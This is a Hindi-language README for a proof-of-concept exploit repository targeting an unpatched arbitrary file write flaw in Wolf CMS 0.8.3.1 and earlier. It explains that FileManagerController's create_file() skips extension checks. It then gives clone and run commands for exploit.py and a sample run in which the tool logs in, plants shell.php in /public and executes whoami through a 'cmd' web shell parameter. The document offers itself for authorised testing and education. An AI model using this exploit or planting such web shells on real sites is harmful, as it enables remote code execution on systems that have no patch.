
Wolf CMS <= 0.8.3.1 के लिए PoC एक्सप्लॉइट: एडमिन में प्रमाणीकरण करता है, FileManagerController के माध्यम से /public में एक मनमाना PHP फ़ाइल लिखता है, और वेब शेल के माध्यम से कमांड निष्पादित करता है।
इस रिपॉजिटरी में CVE-2026-67206 के लिए एक Proof of Concept (PoC) एक्सप्लॉइट शामिल है
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इसे उन सिस्टमों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है।
Wolf CMS के 0.8.3.1 तक के संस्करणों में एक मनमानी फ़ाइल लेखन भेद्यता मौजूद है। यह एक प्रमाणित हमलावर को FileManagerController.php के create_file() और save() फ़ंक्शन के माध्यम से वेब रूट के /public निर्देशिका में दुर्भावनापूर्ण मनमानी फ़ाइलें लिखने की अनुमति देता है। FileManagerController.php का create_file() फ़ंक्शन फ़ाइल एक्सटेंशन को मान्य नहीं करता है, जिससे प्रमाणित हमलावर दुर्भावनापूर्ण PHP स्क्रिप्ट लिख सकते हैं और रिमोट कोड निष्पादन विशेषाधिकार प्राप्त कर सकते हैं।
स्रोत कोड विश्लेषण और एक्सप्लॉइट प्रदर्शन के साथ एक विस्तृत लेख मेरे Medium ब्लॉग पर पाया जा सकता है।
Wolf CMS के 0.8.3.1 तक के सभी संस्करण प्रभावित हैं। Wolf CMS रिपॉजिटरी को 28 अगस्त, 2021 को संग्रहीत (archived) कर दिया गया है और अब इसे सक्रिय रूप से अनुरक्षित नहीं किया जाता है। इस भेद्यता के लिए वर्तमान में कोई पैच मौजूद नहीं है।
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data